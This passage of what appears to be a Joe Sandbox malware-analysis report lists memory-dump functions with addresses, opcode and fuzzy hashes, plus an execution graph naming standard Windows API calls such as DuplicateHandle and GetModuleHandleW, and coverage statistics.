                                                                            • Opcode ID: eba6af5db21128f86131347696428da0897dc1e68ef7542db1a87efe2b881678
                                                                            • Instruction ID: 1d4d8055e22e5b8242e6e83ce49036c09d1d596764e5319e9b6320efd7adb968
                                                                            • Opcode Fuzzy Hash: eba6af5db21128f86131347696428da0897dc1e68ef7542db1a87efe2b881678
                                                                            • Instruction Fuzzy Hash: 52F02E21325A54EBC75611394914EBF7F5B8FC2712F4440AFDA41CF391DEA58D059392
                                                                            Function 082A09A0 Relevance: .0, Instructions: 39COMMON
                                                                            Download Yara Rule
                                                                            Memory Dump Source
                                                                            • Source File: 00000016.00000002.3911236782.00000000082A0000.00000040.00000800.00020000.00000000.sdmp, Offset: 082A0000, based on PE: false
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_22_2_82a0000_outlooks.jbxd
                                                                            Similarity
                                                                            • API ID:
                                                                            • String ID:
                                                                            • API String ID:
                                                                            • Opcode ID: 897e0a2450929120804a8a80080965ec1d55ed1bb868e6592a9c26951eec891e
                                                                            • Instruction ID: 6f0b3c5f4ded66b87d54eedebc567780c955eda39438a213453b885bfb2eca99
                                                                            • Opcode Fuzzy Hash: 897e0a2450929120804a8a80080965ec1d55ed1bb868e6592a9c26951eec891e
                                                                            • Instruction Fuzzy Hash: 69011979300614DBC7099B28D46496AB7A7EFCCB11B108169EA068B790CF75EC02CBD5
                                                                            Function 082AB6E0 Relevance: .0, Instructions: 39COMMON
                                                                            Download Yara Rule
                                                                            Memory Dump Source
                                                                            • Source File: 00000016.00000002.3911236782.00000000082A0000.00000040.00000800.00020000.00000000.sdmp, Offset: 082A0000, based on PE: false
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_22_2_82a0000_outlooks.jbxd
                                                                            Similarity
                                                                            • API ID:
                                                                            • String ID:
                                                                            • API String ID:
                                                                            • Opcode ID: 13ccbd6f1d81410e7fa4e970ddd90a05c36103bf52b386e1120724435188c4bb
                                                                            • Instruction ID: f0a6dcde8da002540d1120b8db659e521f4cf9a60a6eeba5b5fdb14ad1637e5e
                                                                            • Opcode Fuzzy Hash: 13ccbd6f1d81410e7fa4e970ddd90a05c36103bf52b386e1120724435188c4bb
                                                                            • Instruction Fuzzy Hash: BA014F35E10609AFCB00DFA9D5449DEBBF9FF89711F108169E519A7310EB70AA04CB51
                                                                            Function 0182D603 Relevance: .0, Instructions: 37COMMON
                                                                            Download Yara Rule
                                                                            Memory Dump Source
                                                                            • Source File: 00000016.00000002.3872901199.000000000182D000.00000040.00000800.00020000.00000000.sdmp, Offset: 0182D000, based on PE: false
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_22_2_182d000_outlooks.jbxd
                                                                            Similarity
                                                                            • API ID:
                                                                            • String ID:
                                                                            • API String ID:
                                                                            • Opcode ID: edd9d80bd843838da070f43f441cde5ae6b4e45d5dd3732d40e07c8e1cbe53fc
                                                                            • Instruction ID: f9661a1e858ff687dfd58e5519fc1f4a462ffba9705837bc4721dfefd4c91e3e
                                                                            • Opcode Fuzzy Hash: edd9d80bd843838da070f43f441cde5ae6b4e45d5dd3732d40e07c8e1cbe53fc
                                                                            • Instruction Fuzzy Hash: F9F0FF75600614AF97248F0ADC85C27FBBDEFD4774715C55AE84A4B612C671EC42CEA0
                                                                            Function 0182D5F4 Relevance: .0, Instructions: 35COMMON
                                                                            Download Yara Rule
                                                                            Memory Dump Source
                                                                            • Source File: 00000016.00000002.3872901199.000000000182D000.00000040.00000800.00020000.00000000.sdmp, Offset: 0182D000, based on PE: false
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_22_2_182d000_outlooks.jbxd
                                                                            Similarity
                                                                            • API ID:
                                                                            • String ID:
                                                                            • API String ID:
                                                                            • Opcode ID: 29f2c6492582cd7a8c8f6d7984870846c9ae496281bfddb99291cd7bc33d02eb
                                                                            • Instruction ID: 50b1426d7643cee58304d374df3bb6266de0f78fa89df0849d6cf21cc7c7bbe6
                                                                            • Opcode Fuzzy Hash: 29f2c6492582cd7a8c8f6d7984870846c9ae496281bfddb99291cd7bc33d02eb
                                                                            • Instruction Fuzzy Hash: D6F03C75104650AFD725CF06CC84C23BFB9EF89760719858AE84A8B362C671FC42CFA0
                                                                            Function 082AA96C Relevance: .0, Instructions: 33COMMON
                                                                            Download Yara Rule
                                                                            Memory Dump Source
                                                                            • Source File: 00000016.00000002.3911236782.00000000082A0000.00000040.00000800.00020000.00000000.sdmp, Offset: 082A0000, based on PE: false
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_22_2_82a0000_outlooks.jbxd
                                                                            Similarity
                                                                            • API ID:
                                                                            • String ID:
                                                                            • API String ID:
                                                                            • Opcode ID: 45e486d0c874e1153eb80bdf4e532081cb2c78b6fddac9f6c7cea865e0d00a41
                                                                            • Instruction ID: e7f3427c24d9eda91f04345a0d65d2ef9b752b5532bf14a039e5f9e776dbbdaf
                                                                            • Opcode Fuzzy Hash: 45e486d0c874e1153eb80bdf4e532081cb2c78b6fddac9f6c7cea865e0d00a41
                                                                            • Instruction Fuzzy Hash: 2EF0AF30A1021AEFDB109F64C899BEEBBB2FF40310F040059E406AB261CB759C46CB80
                                                                            Function 082A0728 Relevance: .0, Instructions: 32COMMON
                                                                            Download Yara Rule
                                                                            Memory Dump Source
                                                                            • Source File: 00000016.00000002.3911236782.00000000082A0000.00000040.00000800.00020000.00000000.sdmp, Offset: 082A0000, based on PE: false
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_22_2_82a0000_outlooks.jbxd
                                                                            Similarity
                                                                            • API ID:
                                                                            • String ID:
                                                                            • API String ID:
                                                                            • Opcode ID: fa07a97b38e7a28f8f84c854db3e8d30d7e2da57a0780b3edde270ca3afed486
                                                                            • Instruction ID: c418d83d01f9e66602efd36d0f3052dd81c0038f9f4f4a7df3824b03dede42a7
                                                                            • Opcode Fuzzy Hash: fa07a97b38e7a28f8f84c854db3e8d30d7e2da57a0780b3edde270ca3afed486
                                                                            • Instruction Fuzzy Hash: 6EF05E393002009FC708DB29D854D3AB7AAEFC9721B1081A9FA06CB360CA31EC42CB90
                                                                            Function 082AA551 Relevance: .0, Instructions: 27COMMON
                                                                            Download Yara Rule
                                                                            Memory Dump Source
                                                                            • Source File: 00000016.00000002.3911236782.00000000082A0000.00000040.00000800.00020000.00000000.sdmp, Offset: 082A0000, based on PE: false
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_22_2_82a0000_outlooks.jbxd
                                                                            Similarity
                                                                            • API ID:
                                                                            • String ID:
                                                                            • API String ID:
                                                                            • Opcode ID: e2efe2c9fdab4b6e3235d129721f583a12436c9761f7fbb9385a94dd5b556b0e
                                                                            • Instruction ID: 059ec883af57f289e514729beee4e8ea54a14ee98f9dc194a288a9821eccafcc
                                                                            • Opcode Fuzzy Hash: e2efe2c9fdab4b6e3235d129721f583a12436c9761f7fbb9385a94dd5b556b0e
                                                                            • Instruction Fuzzy Hash: 4DF0A9307002109FDB08DB58D984A69BBF5FF88724F158499E50AAB362C772FC068BA0
                                                                            Function 082AAA20 Relevance: .0, Instructions: 21COMMON
                                                                            Download Yara Rule
                                                                            Memory Dump Source
                                                                            • Source File: 00000016.00000002.3911236782.00000000082A0000.00000040.00000800.00020000.00000000.sdmp, Offset: 082A0000, based on PE: false
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_22_2_82a0000_outlooks.jbxd
                                                                            Similarity
                                                                            • API ID:
                                                                            • String ID:
                                                                            • API String ID:
                                                                            • Opcode ID: dc1b77453e3ba1947ffa6cffbaa8316042bbfebc3d4e96d21647d73bc71153d3
                                                                            • Instruction ID: 21066ae1602471453628ffb2175916058062465feee5cac1133438a2790c36ae
                                                                            • Opcode Fuzzy Hash: dc1b77453e3ba1947ffa6cffbaa8316042bbfebc3d4e96d21647d73bc71153d3
                                                                            • Instruction Fuzzy Hash: 77E0C23230D3949BC705A3B9582059ABF9B9FC6220789819ED64ACB282CD75AC0247A9
                                                                            Function 082AAA30 Relevance: .0, Instructions: 16COMMON
                                                                            Download Yara Rule
                                                                            Memory Dump Source
                                                                            • Source File: 00000016.00000002.3911236782.00000000082A0000.00000040.00000800.00020000.00000000.sdmp, Offset: 082A0000, based on PE: false
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_22_2_82a0000_outlooks.jbxd
                                                                            Similarity
                                                                            • API ID:
                                                                            • String ID:
                                                                            • API String ID:
                                                                            • Opcode ID: 6e502260a4ccb041b6f5fffe118d705aed345ece6b60202beb9a57829801a844
                                                                            • Instruction ID: 177c8aa68763a98c4a961c7b38d49420e9e9e5feb10d98691931d77297d1def5
                                                                            • Opcode Fuzzy Hash: 6e502260a4ccb041b6f5fffe118d705aed345ece6b60202beb9a57829801a844
                                                                            • Instruction Fuzzy Hash: 7CD0A93230922887C208A3BAA4006AF728FDFC8320B41802E960E83740CE70AC0106A8
                                                                            Function 082A0E51 Relevance: .0, Instructions: 16COMMON
                                                                            Download Yara Rule
                                                                            Memory Dump Source
                                                                            • Source File: 00000016.00000002.3911236782.00000000082A0000.00000040.00000800.00020000.00000000.sdmp, Offset: 082A0000, based on PE: false
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_22_2_82a0000_outlooks.jbxd
                                                                            Similarity
                                                                            • API ID:
                                                                            • String ID:
                                                                            • API String ID:
                                                                            • Opcode ID: 8d28f7c6ee8169861c68d3894c74d9e2d496e9900762f430ddb7e3d31137a430
                                                                            • Instruction ID: 350a4567292301f1598ef1e32142ce978c64dee0dd68d3ee804b4b7cda9de99d
                                                                            • Opcode Fuzzy Hash: 8d28f7c6ee8169861c68d3894c74d9e2d496e9900762f430ddb7e3d31137a430
                                                                            • Instruction Fuzzy Hash: 61D0C97421A7C1DFD71B47219A18DA63F33EBC3341B85849AE582CF262C2368D95DB22
                                                                            Function 082A06F1 Relevance: .0, Instructions: 16COMMON
                                                                            Download Yara Rule
                                                                            Memory Dump Source
                                                                            • Source File: 00000016.00000002.3911236782.00000000082A0000.00000040.00000800.00020000.00000000.sdmp, Offset: 082A0000, based on PE: false
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_22_2_82a0000_outlooks.jbxd
                                                                            Similarity
                                                                            • API ID:
                                                                            • String ID:
                                                                            • API String ID:
                                                                            • Opcode ID: 1e72a1600730bf5d7034839365944571c6d4df2cafd8550cccadcee7651c5276
                                                                            • Instruction ID: dbfc42ca7d281c48a4a9d52c31c2e1fc511e94faa53db9faf57e617ba9df69a4
                                                                            • Opcode Fuzzy Hash: 1e72a1600730bf5d7034839365944571c6d4df2cafd8550cccadcee7651c5276
                                                                            • Instruction Fuzzy Hash: 89D0927664A680AFC7038B24DC55CD03FB2DB673A131A40D2E489CF272C2269955D762
                                                                            Function 082A38B1 Relevance: .0, Instructions: 14COMMON
                                                                            Download Yara Rule
                                                                            Memory Dump Source
                                                                            • Source File: 00000016.00000002.3911236782.00000000082A0000.00000040.00000800.00020000.00000000.sdmp, Offset: 082A0000, based on PE: false
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_22_2_82a0000_outlooks.jbxd
                                                                            Similarity
                                                                            • API ID:
                                                                            • String ID:
                                                                            • API String ID:
                                                                            • Opcode ID: 3f0f01b82553a2e1715327d83fd3493355b8fcbb7f111aeb91c27a0f1da4cc92
                                                                            • Instruction ID: c1cd5170b329c17e9589a6b54e36f8e0502e8dcdcf8f3329a27eac4839a93ce6
                                                                            • Opcode Fuzzy Hash: 3f0f01b82553a2e1715327d83fd3493355b8fcbb7f111aeb91c27a0f1da4cc92
                                                                            • Instruction Fuzzy Hash: A3D0223000E384AFC307CF64C818881BFB5EF12301B0840EAE2C28F033CA329806C765
                                                                            Function 082A9F78 Relevance: .0, Instructions: 11COMMON
                                                                            Download Yara Rule
                                                                            Memory Dump Source
                                                                            • Source File: 00000016.00000002.3911236782.00000000082A0000.00000040.00000800.00020000.00000000.sdmp, Offset: 082A0000, based on PE: false
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_22_2_82a0000_outlooks.jbxd
                                                                            Similarity
                                                                            • API ID:
                                                                            • String ID:
                                                                            • API String ID:
                                                                            • Opcode ID: e5fde273494a0456c5a0dc469b11c23bfd9a044a0e12dc74509de2b2979cbe18
                                                                            • Instruction ID: e289c54e396c09f03b25d400aa04d7cebc1d5c6b8076e8ba51c706c81a35a037
                                                                            • Opcode Fuzzy Hash: e5fde273494a0456c5a0dc469b11c23bfd9a044a0e12dc74509de2b2979cbe18
                                                                            • Instruction Fuzzy Hash: CEC08C3442420CCFFA205A62D4497643B9CEB0433BF1022DCEC0885181CB7244D3C597
                                                                            Function 082A0700 Relevance: .0, Instructions: 8COMMON
                                                                            Download Yara Rule
                                                                            Memory Dump Source
                                                                            • Source File: 00000016.00000002.3911236782.00000000082A0000.00000040.00000800.00020000.00000000.sdmp, Offset: 082A0000, based on PE: false
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_22_2_82a0000_outlooks.jbxd
                                                                            Similarity
                                                                            • API ID:
                                                                            • String ID:
                                                                            • API String ID:
                                                                            • Opcode ID: 9145439845d19ed285ef8ed2e2731e53e84310996d3e08af64ba1494253e8755
                                                                            • Instruction ID: a5ced1602b898661de329531365079a034e3d75a808f59c5ffcbefa728424f66
                                                                            • Opcode Fuzzy Hash: 9145439845d19ed285ef8ed2e2731e53e84310996d3e08af64ba1494253e8755
                                                                            • Instruction Fuzzy Hash: 58C0927A140208EFC700DF69E848C85BBB8EF1977171180A1FA088B332C732EC60DA94
                                                                            Function 082A38C0 Relevance: .0, Instructions: 7COMMON
                                                                            Download Yara Rule
                                                                            Memory Dump Source
                                                                            • Source File: 00000016.00000002.3911236782.00000000082A0000.00000040.00000800.00020000.00000000.sdmp, Offset: 082A0000, based on PE: false
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_22_2_82a0000_outlooks.jbxd
                                                                            Similarity
                                                                            • API ID:
                                                                            • String ID:
                                                                            • API String ID:
                                                                            • Opcode ID: 20d9ab8db520123c5b8d7d2464aace53457b97e79d33cc772015ab6ab7933399
                                                                            • Instruction ID: 15d48e204560f693536ceb49acc2283d13906578a2ef595cda0843c6ce5d7324
                                                                            • Opcode Fuzzy Hash: 20d9ab8db520123c5b8d7d2464aace53457b97e79d33cc772015ab6ab7933399
                                                                            • Instruction Fuzzy Hash: F0B09236004208AB86019A84E904896BB69AB586017008025B609061518B32A922DB94

                                                                            Execution Graph

                                                                            Execution Coverage:8.1%
                                                                            Dynamic/Decrypted Code Coverage:100%
                                                                            Signature Coverage:0%
                                                                            Total number of Nodes:83
                                                                            Total number of Limit Nodes:10
                                                                            execution_graph 13396 2b56540 13397 2b56586 13396->13397 13401 2b56720 13397->13401 13404 2b5670f 13397->13404 13398 2b56673 13408 2b5611c 13401->13408 13405 2b5674e 13404->13405 13406 2b56713 13404->13406 13405->13398 13406->13405 13407 2b5611c DuplicateHandle 13406->13407 13407->13405 13409 2b56788 DuplicateHandle 13408->13409 13410 2b5674e 13409->13410 13410->13398 13411 2b5bf08 13412 2b5bf17 13411->13412 13415 2b5c000 13411->13415 13424 2b5bff0 13411->13424 13416 2b5c011 13415->13416 13419 2b5c034 13415->13419 13433 2b5af60 13416->13433 13419->13412 13420 2b5c02c 13420->13419 13421 2b5c238 GetModuleHandleW 13420->13421 13422 2b5c265 13421->13422 13422->13412 13425 2b5c011 13424->13425 13428 2b5c034 13424->13428 13426 2b5af60 GetModuleHandleW 13425->13426 13427 2b5c01c 13426->13427 13427->13428 13432 2b5c698 GetModuleHandleW 13427->13432 13428->13412 13429 2b5c02c 13429->13428 13430 2b5c238 GetModuleHandleW 13429->13430 13431 2b5c265 13430->13431 13431->13412 13432->13429 13434 2b5c1f0 GetModuleHandleW 13433->13434 13436 2b5c01c 13434->13436 13436->13419 13437 2b5c698 13436->13437 13438 2b5af60 GetModuleHandleW 13437->13438 13439 2b5c6ac 13438->13439 13439->13420 13440 2b54668 13441 2b54676 13440->13441 13446 2b56de0 13441->13446 13444 2b54704 13447 2b56e05 13446->13447 13455 2b56ef0 13447->13455 13459 2b56edf 13447->13459 13448 2b546e9 13451 2b5421c 13448->13451 13452 2b54227 13451->13452 13467 2b58560 13452->13467 13454 2b58806 13454->13444 13457 2b56f17 13455->13457 13456 2b56ff4 13456->13456 13457->13456 13463 2b56414 13457->13463 13461 2b56f17 13459->13461 13460 2b56ff4 13460->13460 13461->13460 13462 2b56414 CreateActCtxA 13461->13462 13462->13460 13464 2b57370 CreateActCtxA 13463->13464 13466 2b57433 13464->13466 13466->13466 13468 2b5856b 13467->13468 13471 2b58580 13468->13471 13470 2b588dd 13470->13454 13472 2b5858b 13471->13472 13475 2b585b0 13472->13475 13474 2b589ba 13474->13470 13476 2b585bb 13475->13476 13479 2b585e0 13476->13479 13478 2b58aad 13478->13474 13481 2b585eb 13479->13481 13480 2b59ed1 13480->13478 13481->13480 13483 2b5df70 13481->13483 13484 2b5df91 13483->13484 13485 2b5dfb5 13484->13485 13487 2b5e120 13484->13487 13485->13480 13488 2b5e12d 13487->13488 13489 2b5e166 13488->13489 13491 2b5c464 13488->13491 13489->13485 13492 2b5c46f 13491->13492 13493 2b5e1d8 13492->13493 13495 2b5c498 13492->13495 13496 2b5c4a3 13495->13496 13497 2b585e0 KiUserCallbackDispatcher 13496->13497 13498 2b5e247 13497->13498 13501 2b5e2c0 13498->13501 13499 2b5e256 13499->13493 13502 2b5e2ee 13501->13502 13503 2b5e3ba KiUserCallbackDispatcher 13502->13503 13504 2b5e3bf 13502->13504 13503->13504

                                                                            Executed Functions

                                                                            Function 02B5C000 Relevance: 1.7, APIs: 1, Instructions: 196COMMON
                                                                            Download Yara Rule

                                                                            Control-flow Graph

                                                                            Memory Dump Source
                                                                            • Source File: 00000022.00000002.1688039445.0000000002B50000.00000040.00000800.00020000.00000000.sdmp, Offset: 02B50000, based on PE: false
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_34_2_2b50000_eNuXmIwkixzW.jbxd
                                                                            Similarity
                                                                            • API ID: HandleModule
                                                                            • String ID:
                                                                            • API String ID: 4139908857-0
                                                                            • Opcode ID: 55b6577b0afcb048482fe02d8746151d55db90c2a34cb0ff27772f8f9cd6dd43
                                                                            • Instruction ID: 108042a008ffc19a2a5d06a424877dd90deb1139b46cc784a3f8c9abe810f634
                                                                            • Opcode Fuzzy Hash: 55b6577b0afcb048482fe02d8746151d55db90c2a34cb0ff27772f8f9cd6dd43
                                                                            • Instruction Fuzzy Hash: BC7126B0A00B158FD724DF69D44175ABBF6FF88704F048A6ED88ADBA40DB75E845CB90
                                                                            Function 02B56414 Relevance: 1.6, APIs: 1, Instructions: 96COMMON
                                                                            Download Yara Rule

                                                                            Control-flow Graph

                                                                            • Executed
                                                                            • Not Executed
                                                                            control_flow_graph 56 2b56414-2b57431 CreateActCtxA 59 2b57433-2b57439 56->59 60 2b5743a-2b57494 56->60 59->60 67 2b57496-2b57499 60->67 68 2b574a3-2b574a7 60->68 67->68 69 2b574a9-2b574b5 68->69 70 2b574b8 68->70 69->70 71 2b574b9 70->71 71->71
                                                                            APIs
                                                                            • CreateActCtxA.KERNEL32(?), ref: 02B57421
                                                                            Memory Dump Source
                                                                            • Source File: 00000022.00000002.1688039445.0000000002B50000.00000040.00000800.00020000.00000000.sdmp, Offset: 02B50000, based on PE: false
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_34_2_2b50000_eNuXmIwkixzW.jbxd
                                                                            Similarity
                                                                            • API ID: Create
                                                                            • String ID:
                                                                            • API String ID: 2289755597-0
                                                                            • Opcode ID: 79bea8d329d48471b80fa8a710eba29198a7c549d8040f493f5016a854df5207
                                                                            • Instruction ID: 6b349e367e489f1f522d76f8c5506adfed6d78cc0252fd8c1e22d670137eaa90
                                                                            • Opcode Fuzzy Hash: 79bea8d329d48471b80fa8a710eba29198a7c549d8040f493f5016a854df5207
                                                                            • Instruction Fuzzy Hash: B641BF70D00729CBDB25DFA9C844B9EFBF6BF48704F2480AAD408AB251DB756946CF90
                                                                            Function 02B57364 Relevance: 1.6, APIs: 1, Instructions: 96COMMON
                                                                            Download Yara Rule

                                                                            Control-flow Graph

                                                                            • Executed
                                                                            • Not Executed
                                                                            control_flow_graph 73 2b57364-2b5736b 74 2b57370-2b57431 CreateActCtxA 73->74 76 2b57433-2b57439 74->76 77 2b5743a-2b57494 74->77 76->77 84 2b57496-2b57499 77->84 85 2b574a3-2b574a7 77->85 84->85 86 2b574a9-2b574b5 85->86 87 2b574b8 85->87 86->87 88 2b574b9 87->88 88->88
                                                                            APIs
                                                                            • CreateActCtxA.KERNEL32(?), ref: 02B57421
                                                                            Memory Dump Source
                                                                            • Source File: 00000022.00000002.1688039445.0000000002B50000.00000040.00000800.00020000.00000000.sdmp, Offset: 02B50000, based on PE: false
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_34_2_2b50000_eNuXmIwkixzW.jbxd
                                                                            Similarity
                                                                            • API ID: Create
                                                                            • String ID:
                                                                            • API String ID: 2289755597-0
                                                                            • Opcode ID: 0466ef59aafad352543ef065450909ab1d588b9b0d5f1f02f8fc7ba1bf9c552e
                                                                            • Instruction ID: 085864e5105fe96fd7553e54ac6c3b6d5b48cc2deaecbca2d2c982d2af2cc514
                                                                            • Opcode Fuzzy Hash: 0466ef59aafad352543ef065450909ab1d588b9b0d5f1f02f8fc7ba1bf9c552e
                                                                            • Instruction Fuzzy Hash: F341AE71D00729CBEB25CFA9C844B8EBBF6BF49704F24806AD418AB251DB756946CF90
                                                                            Function 02B56780 Relevance: 1.6, APIs: 1, Instructions: 66COMMON
                                                                            Download Yara Rule

                                                                            Control-flow Graph

                                                                            • Executed
                                                                            • Not Executed
                                                                            control_flow_graph 90 2b56780-2b56783 92 2b56788-2b5681c DuplicateHandle 90->92 93 2b56825-2b56842 92->93 94 2b5681e-2b56824 92->94 94->93
                                                                            APIs
                                                                            • DuplicateHandle.KERNELBASE(?,?,?,?,?,?,?,?,?,?,02B5674E,?,?,?,?,?), ref: 02B5680F
                                                                            Memory Dump Source
                                                                            • Source File: 00000022.00000002.1688039445.0000000002B50000.00000040.00000800.00020000.00000000.sdmp, Offset: 02B50000, based on PE: false
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_34_2_2b50000_eNuXmIwkixzW.jbxd
                                                                            Similarity
                                                                            • API ID: DuplicateHandle
                                                                            • String ID:
                                                                            • API String ID: 3793708945-0
                                                                            • Opcode ID: fdf93f61b1501d9a27a99bb63753baa9b32881a048ab520a6a8158a0485efd1d
                                                                            • Instruction ID: 5e7c9a4061df5bd380fe2d36964afe0770669e377350510146bbd881e71e5a66
                                                                            • Opcode Fuzzy Hash: fdf93f61b1501d9a27a99bb63753baa9b32881a048ab520a6a8158a0485efd1d
                                                                            • Instruction Fuzzy Hash: 132105B59002589FDB10CF9AD884BDEBBF9EB48314F14801AE918A7310D378A944CFA5
                                                                            Function 02B5611C Relevance: 1.6, APIs: 1, Instructions: 65COMMON
                                                                            Download Yara Rule

                                                                            Control-flow Graph

                                                                            • Executed
                                                                            • Not Executed
                                                                            control_flow_graph 97 2b5611c-2b5681c DuplicateHandle 99 2b56825-2b56842 97->99 100 2b5681e-2b56824 97->100 100->99
                                                                            APIs
                                                                            • DuplicateHandle.KERNELBASE(?,?,?,?,?,?,?,?,?,?,02B5674E,?,?,?,?,?), ref: 02B5680F
                                                                            Memory Dump Source
                                                                            • Source File: 00000022.00000002.1688039445.0000000002B50000.00000040.00000800.00020000.00000000.sdmp, Offset: 02B50000, based on PE: false
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_34_2_2b50000_eNuXmIwkixzW.jbxd
                                                                            Similarity
                                                                            • API ID: DuplicateHandle
                                                                            • String ID:
                                                                            • API String ID: 3793708945-0
                                                                            • Opcode ID: 46ecfde988c656911fabdea2c1a9273a30105f9854e518b59860e0db7b8165b6
                                                                            • Instruction ID: 3aeda71c22234cc66a2bed53ff9fb9e8bdc2b695439c84c19cb932d4b8d8bb64
                                                                            • Opcode Fuzzy Hash: 46ecfde988c656911fabdea2c1a9273a30105f9854e518b59860e0db7b8165b6
                                                                            • Instruction Fuzzy Hash: CE21E6B59003589FDB10CF9AD884BDEBBF9FB48310F14845AE918A7350D378A944CFA5
                                                                            Function 02B5AF60 Relevance: 1.6, APIs: 1, Instructions: 50COMMON
                                                                            Download Yara Rule

                                                                            Control-flow Graph

                                                                            • Executed
                                                                            • Not Executed
                                                                            control_flow_graph 103 2b5af60-2b5c230 105 2b5c232-2b5c235 103->105 106 2b5c238-2b5c263 GetModuleHandleW 103->106 105->106 107 2b5c265-2b5c26b 106->107 108 2b5c26c-2b5c280 106->108 107->108
                                                                            APIs
                                                                            • GetModuleHandleW.KERNELBASE(00000000,?,?,?,?,?,?,?,02B5C01C), ref: 02B5C256
                                                                            Memory Dump Source
                                                                            • Source File: 00000022.00000002.1688039445.0000000002B50000.00000040.00000800.00020000.00000000.sdmp, Offset: 02B50000, based on PE: false
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_34_2_2b50000_eNuXmIwkixzW.jbxd
                                                                            Similarity
                                                                            • API ID: HandleModule
                                                                            • String ID:
                                                                            • API String ID: 4139908857-0
                                                                            • Opcode ID: 0032b498915eb9d20ce82decd96d1df1d613bc08c520dbdcd6b927b876950471
                                                                            • Instruction ID: ea24aa34783d75aaa711f0287ea51faf709be199f373926bc6cefb888dccd614
                                                                            • Opcode Fuzzy Hash: 0032b498915eb9d20ce82decd96d1df1d613bc08c520dbdcd6b927b876950471
                                                                            • Instruction Fuzzy Hash: 131132B5C003598FCB10DF9AC444BDEFBF5EB88614F10846AD929BB200C379A945CFA4
                                                                            Function 02ACD01C Relevance: .1, Instructions: 72COMMON
                                                                            Download Yara Rule
                                                                            Memory Dump Source
                                                                            • Source File: 00000022.00000002.1685119061.0000000002ACD000.00000040.00000800.00020000.00000000.sdmp, Offset: 02ACD000, based on PE: false
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_34_2_2acd000_eNuXmIwkixzW.jbxd
                                                                            Similarity
                                                                            • API ID:
                                                                            • String ID:
                                                                            • API String ID:
                                                                            • Opcode ID: 08cd23de4a35f5441d7cc65d223fa09f6626e83d94c29fd839c5dd1fdd490233
                                                                            • Instruction ID: b55997901c8e61343484cc5e291cd927306ed1df08dfefb8556d3af64334dff4
                                                                            • Opcode Fuzzy Hash: 08cd23de4a35f5441d7cc65d223fa09f6626e83d94c29fd839c5dd1fdd490233
                                                                            • Instruction Fuzzy Hash: DA210071604B00EFDB14DF18D8C0B16BBA1FB84224F30C57DD84A0B246CB3AD807CA62
                                                                            Function 02ACD006 Relevance: .1, Instructions: 62COMMON
                                                                            Download Yara Rule
                                                                            Memory Dump Source
                                                                            • Source File: 00000022.00000002.1685119061.0000000002ACD000.00000040.00000800.00020000.00000000.sdmp, Offset: 02ACD000, based on PE: false
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_34_2_2acd000_eNuXmIwkixzW.jbxd
                                                                            Similarity
                                                                            • API ID:
                                                                            • String ID:
                                                                            • API String ID:
                                                                            • Opcode ID: de5c47d5cf5cab9ec5956e431e03c3a6b747b2a5d7f38f72fab0dcbcfe3833a8
                                                                            • Instruction ID: 4a982bc326ac49800c7956035aa54853095f0c1d8c26cf77c27c446c2828a880
                                                                            • Opcode Fuzzy Hash: de5c47d5cf5cab9ec5956e431e03c3a6b747b2a5d7f38f72fab0dcbcfe3833a8
                                                                            • Instruction Fuzzy Hash: ED2180755097808FCB02CF24D5D4715BF71EB46214F28C5EED8898F6A7C33A940ACB62

                                                                            Execution Graph

                                                                            Execution Coverage:7.7%
                                                                            Dynamic/Decrypted Code Coverage:100%
                                                                            Signature Coverage:0%
                                                                            Total number of Nodes:118
                                                                            Total number of Limit Nodes:12
